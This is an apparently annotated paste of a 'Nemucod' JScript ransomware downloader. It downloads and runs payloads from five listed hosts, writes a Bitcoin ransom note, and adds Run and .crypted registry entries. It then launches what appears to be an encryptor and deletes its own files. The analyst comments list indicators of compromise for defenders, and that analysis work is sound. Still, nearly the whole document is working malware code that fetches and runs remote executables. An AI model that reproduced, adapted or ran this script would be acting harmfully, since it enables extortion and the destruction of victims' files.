James_inthe_box

Nemucod

May 20th, 2019
  // Analyst annotation (comments only; every script line below is unchanged).
  // Windows Script Host JScript from a paste titled "Nemucod". The leading "N." on each
  // line is the paste site's gutter number, not part of the script.
  // Flow visible in this listing:
  //   1. skip everything if %TEMP%\a.txt already exists;
  //   2. fetch up to five payloads over plain HTTP from a fixed host list into %TEMP%;
  //   3. if the three later payloads all arrived: write a ransom note, add registry entries,
  //      run the downloaded a.exe against a.php, show the note, then delete the payloads.
  // Artifacts a defender can look for, all taken from the lines below: GET requests to
  // /counter/?ad=...&id=...&rnd=... on the listed hosts, %TEMP%\a1.exe, a2.exe, a.exe,
  // php4ts.dll, a.php and a.txt, an HKCU Run value named "Crypted", an HKCR ".crypted"
  // association, and DECRYPT.txt on the desktop.

  // Identifier sent as the `id` query parameter on every request (meaning not shown here).
  1. var id = 'LXD8ChCoeaXvY0jiabUiGD45YojpwUx-mun3rI1oJa-5Ynt8IbxuB7dQ42NDbOSrK4RRYlBr7fA-';
  // Sent as the `ad` query parameter and printed in the note as the Bitcoin payment address.
  2. var ad = '15nUMTVJLKYo27GgWbovLHA8DidAx6jvqm';
  // Amount in BTC quoted in the ransom note.
  3. var bc = '0.47531';
  // Index of the host that last served a payload; the inner loop resumes from it.
  4. var ld = 0;
  // cq is a double quote (char 34) and cs a backslash (char 92); building them at run time
  // keeps literal quotes and path separators out of the string constants.
  5. var cq = String.fromCharCode(34);
  6. var cs = String.fromCharCode(92);
  // Hosts queried for payloads; the same list is printed in the note as "decryptor" links.
  7. var ll = [
  8. 'dicsom.com',
  9. 'pticemir.ru',
  10. 'www.trucklogist.ru',
  11. 'collegembip.com',
  12. 'retailrzn.ru'
  13. ];
  // COM objects used: shell (process launch, env expansion), HTTP client, binary stream, file system.
  14. var ws = WScript.CreateObject('WScript.Shell');
  // fn = %TEMP%\a is the base path for every dropped file; pd = %TEMP%\php4ts.dll.
  15. var fn = ws.ExpandEnvironmentStrings('%TEMP%') + cs + 'a';
  16. var pd = ws.ExpandEnvironmentStrings('%TEMP%') + cs + 'php4ts.dll';
  17. var xo = WScript.CreateObject('Msxml2.XMLHTTP');
  18. var xa = WScript.CreateObject('ADODB.Stream');
  19. var fo = WScript.CreateObject('Scripting.FileSystemObject');
  // The ransom note file doubles as an "already ran" marker: if %TEMP%\a.txt exists, nothing below executes.
  20. if (!fo.FileExists(fn + '.txt')) {
  // n selects which of the five payloads is being fetched; i walks the host list.
  21. for (var n = 1; n <= 5; n++) {
  22. for (var i = ld; i < ll.length; i++) {
  // dn is set to 1 once a response larger than 1000 bytes has been received for this n.
  23. var dn = 0;
  24. try {
  // Synchronous (third argument false) plain-HTTP GET. 'rnd=' + i + n is string
  // concatenation, so the value is the digits of i followed by n (for example "01").
  25. xo.open('GET', 'http://' + ll[i] + '/counter/?ad=' + ad + '&id=' + id + '&rnd=' + i + n, false);
  26. xo.send();
  27. if (xo.status == 200) {
  28. xa.open();
  // Stream type 1 is binary; the response body is buffered before its size is checked.
  29. xa.type = 1;
  30. xa.write(xo.responseBody);
  // Bodies of 1000 bytes or fewer are discarded and the next host is tried.
  31. if (xa.size > 1000) {
  32. dn = 1;
  // n = 1 and 2: saved as %TEMP%\a1.exe / a2.exe (save option 2 overwrites) and launched
  // at once with a normal window and without waiting. What these two binaries do is not
  // visible in this listing.
  33. if (n <= 2) {
  34. xa.saveToFile(fn + n + '.exe', 2);
  35. try {
  36. ws.Run(fn + n + '.exe', 1, 0);
  37. } catch (er) {
  // NOTE(review): util_log and _inspect are not defined anywhere in this listing; presumably
  // they were injected by the analysis tool that produced this dump. Confirm against the raw sample.
  38. util_log('>>> Silencing catch ' + _inspect(er));
  39. }
  40. ;
  // n = 3, 4, 5: saved only, as %TEMP%\a.exe, %TEMP%\php4ts.dll and %TEMP%\a.php; they are used further down.
  41. } else if (n == 3) {
  42. xa.saveToFile(fn + '.exe', 2);
  43. } else if (n == 4) {
  44. xa.saveToFile(pd, 2);
  45. } else if (n == 5) {
  46. xa.saveToFile(fn + '.php', 2);
  47. }
  48. }
  49. ;
  50. xa.close();
  51. }
  52. ;
  // On success remember the working host and move on to the next payload number.
  53. if (dn == 1) {
  54. ld = i;
  55. break;
  56. }
  57. ;
  58. } catch (er) {
  // Request and save errors are swallowed, so a dead host only moves the loop to the next one.
  59. util_log('>>> Silencing catch ' + _inspect(er));
  60. }
  61. ;
  62. }
  63. ;
  64. }
  65. ;
  // The second stage runs only when a.exe, php4ts.dll and a.php are all present on disk.
  66. if (fo.FileExists(fn + '.exe') && fo.FileExists(pd) && fo.FileExists(fn + '.php')) {
  // Ransom note written to %TEMP%\a.txt. The "RSA-1024" wording is a claim made by the note
  // text only; no encryption code is present in this script.
  67. var fp = fo.CreateTextFile(fn + '.txt', true);
  68. fp.WriteLine('ATTENTION!');
  69. fp.WriteLine('');
  70. fp.WriteLine('All your documents, photos, databases and other important personal files');
  71. fp.WriteLine('were encrypted using strong RSA-1024 algorithm with a unique key.');
  72. fp.WriteLine('To restore your files you have to pay ' + bc + ' BTC (bitcoins).');
  73. fp.WriteLine('Please follow this manual:');
  74. fp.WriteLine('');
  75. fp.WriteLine('1. Create Bitcoin wallet here:');
  76. fp.WriteLine('');
  77. fp.WriteLine(' https://blockchain.info/wallet/new');
  78. fp.WriteLine('');
  79. fp.WriteLine('2. Buy ' + bc + ' BTC with cash, using search here:');
  80. fp.WriteLine('');
  81. fp.WriteLine(' https://localbitcoins.com/buy_bitcoins');
  82. fp.WriteLine('');
  83. fp.WriteLine('3. Send ' + bc + ' BTC to this Bitcoin address:');
  84. fp.WriteLine('');
  85. fp.WriteLine(' ' + ad);
  86. fp.WriteLine('');
  87. fp.WriteLine('4. Open one of the following links in your browser to download decryptor:');
  88. fp.WriteLine('');
  // The links reuse the same hosts and /counter/ path as the downloads, keyed by the payment address.
  89. for (var i = 0; i < ll.length; i++) {
  90. fp.WriteLine(' http://' + ll[i] + '/counter/?a=' + ad);
  91. }
  92. ;
  93. fp.WriteLine('');
  94. fp.WriteLine('5. Run decryptor to restore your files.');
  95. fp.WriteLine('');
  96. fp.WriteLine('PLEASE REMEMBER:');
  97. fp.WriteLine('');
  98. fp.WriteLine(' - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.');
  99. fp.WriteLine(' - Nobody can help you except us.');
  100. fp.WriteLine(' - It`s useless to reinstall Windows, update antivirus software, etc.');
  101. fp.WriteLine(' - Your files can be decrypted only after you make payment.');
  102. fp.WriteLine(' - You can find this manual on your desktop (DECRYPT.txt).');
  103. fp.Close();
  // All ws.Run calls from here use window style 0 (hidden) and go through %COMSPEC% /c.
  // HKCU ...\CurrentVersion\Run value "Crypted" points at the note file.
  104. ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCU' + cs + 'SOFTWARE' + cs + 'Microsoft' + cs + 'Windows' + cs + 'CurrentVersion' + cs + 'Run' + cq + ' /V ' + cq + 'Crypted' + cq + ' /t REG_SZ /F /D ' + cq + fn + '.txt' + cq, 0, 0);
  // Registers the .crypted extension and makes its open command notepad.exe on the note,
  // so opening any .crypted file shows the note.
  105. ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCR' + cs + '.crypted' + cq + ' /ve /t REG_SZ /F /D ' + cq + 'Crypted' + cq, 0, 0);
  106. ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCR' + cs + 'Crypted' + cs + 'shell' + cs + 'open' + cs + 'command' + cq + ' /ve /t REG_SZ /F /D ' + cq + 'notepad.exe ' + cs + cq + fn + '.txt' + cs + cq + cq, 0, 0);
  // Copies the note as DECRYPT.txt to two candidate desktop paths.
  107. ws.Run('%COMSPEC% /c copy /y ' + cq + fn + '.txt' + cq + ' ' + cq + '%AppData%' + cs + 'Desktop' + cs + 'DECRYPT.txt' + cq, 0, 0);
  108. ws.Run('%COMSPEC% /c copy /y ' + cq + fn + '.txt' + cq + ' ' + cq + '%UserProfile%' + cs + 'Desktop' + cs + 'DECRYPT.txt' + cq, 0, 0);
  // Runs a.exe with a.php as its argument and waits for it to exit (third argument 1).
  // NOTE(review): presumably a.exe is a PHP interpreter (php4ts.dll sits beside it) and a.php
  // performs the file encryption; neither payload is in this listing, so confirm from the
  // downloaded samples.
  109. ws.Run('%COMSPEC% /c ' + fn + '.exe ' + cq + fn + '.php' + cq, 0, 1);
  // Shows the note once a.exe has finished.
  110. ws.Run('%COMSPEC% /c notepad.exe ' + cq + fn + '.txt' + cq, 0, 0);
  // Cleanup: a.php is rewritten as 1000 lines of the payment address and then deleted along
  // with a.exe and php4ts.dll. Presumably the overwrite is meant to hinder recovery of the
  // script from disk; the note, the registry entries and a1.exe/a2.exe are left in place.
  111. var fp = fo.CreateTextFile(fn + '.php', true);
  112. for (var i = 0; i < 1000; i++) {
  113. fp.WriteLine(ad);
  114. }
  115. ;
  116. fp.Close();
  117. ws.Run('%COMSPEC% /c DEL ' + cq + fn + '.php' + cq, 0, 0);
  118. ws.Run('%COMSPEC% /c DEL ' + cq + fn + '.exe' + cq, 0, 0);
  119. ws.Run('%COMSPEC% /c DEL ' + cq + pd + cq, 0, 0);
  120. }
  121. ;
  122. }
  123. ;